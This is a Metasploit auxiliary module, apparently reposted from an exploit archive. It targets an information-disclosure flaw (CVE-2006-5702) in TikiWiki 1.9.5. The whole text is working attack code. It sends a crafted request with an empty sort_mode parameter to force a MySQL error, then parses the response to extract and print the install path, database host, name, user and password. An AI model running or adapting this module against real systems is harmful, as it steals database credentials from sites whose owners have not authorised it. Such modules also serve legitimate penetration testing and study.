Share
## https://sploitus.com/exploit?id=PACKETSTORM:180779
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'TikiWiki Information Disclosure',  
'Description' => %q{  
A vulnerability has been reported in Tikiwiki, which can be exploited by  
an anonymous user to dump the MySQL user & passwd just by creating a mysql  
error with the "sort_mode" var.  
  
The vulnerability was reported in Tikiwiki version 1.9.5.  
},  
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['OSVDB', '30172'],  
['BID', '20858'],  
['CVE', '2006-5702'],  
['URL', 'https://web.archive.org/web/20080211225557/http://secunia.com/advisories/22678/'],  
],  
'DisclosureDate' => '2006-11-01',  
'Actions' =>  
[  
['Dump', 'Description' => 'Dump user and password']  
],  
'DefaultAction' => 'Dump'  
))  
  
register_options(  
[  
OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki"]),  
])  
end  
  
def run  
print_status("Establishing a connection to the target...")  
  
uri = normalize_uri(datastore['URI'], '/tiki-lastchanges.php')  
rpath = uri + "?days=1&offset=0&sort_mode="  
  
res = send_request_raw({  
'uri' => rpath,  
'method' => 'GET',  
'headers' =>  
{  
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',  
'Connection' => 'Close',  
}  
}, 25)  
  
if (res and res.message == "OK")  
print_status("Get information about database...")  
  
n = 0  
c = 0  
  
# puts "body is #{res.body.length} bytes"  
infos = res.body.split(/\r?\n/)  
infos.each do |row|  
# puts row.inspect  
if (c < 6)  
if (row.match(/\["file"\]=>/))  
c+=1  
x = n + 1  
y = infos[x].match(/string\(\d+\) "(.*)"/m)  
print_status("Install path : #{y[1]}")  
end  
if (row.match(/\["databaseType"\]=>/))  
c+=1  
x = n + 1  
y = infos[x].match(/string\(\d+\) "(.*)"/m)  
print_status("DB type : #{y[1]}")  
end  
if (row.match(/\["database"\]=>/))  
c+=1  
x = n + 1  
y = infos[x].match(/string\(\d+\) "(.*)"/m)  
print_status("DB name : #{y[1]}")  
end  
if (row.match(/\["host"\]=>/))  
c+=1  
x = n + 1  
y = infos[x].match(/string\(\d+\) "(.*)"/m)  
print_status("DB host : #{y[1]}")  
end  
if (row.match(/\["user"\]=>/))  
c+=1  
x = n + 1  
y = infos[x].match(/string\(\d+\) "(.*)"/m)  
print_status("DB user : #{y[1]}")  
end  
if (row.match(/\["password"\]=>/))  
c+=1  
x = n + 1  
y = infos[x].match(/string\(\d+\) "(.*)"/m)  
print_status("DB password : #{y[1]}")  
end  
n+=1  
end  
end  
  
if (c == 0)  
print_status("Could not obtain information about database.")  
end  
  
else  
print_status("No response from the server.")  
end  
end  
end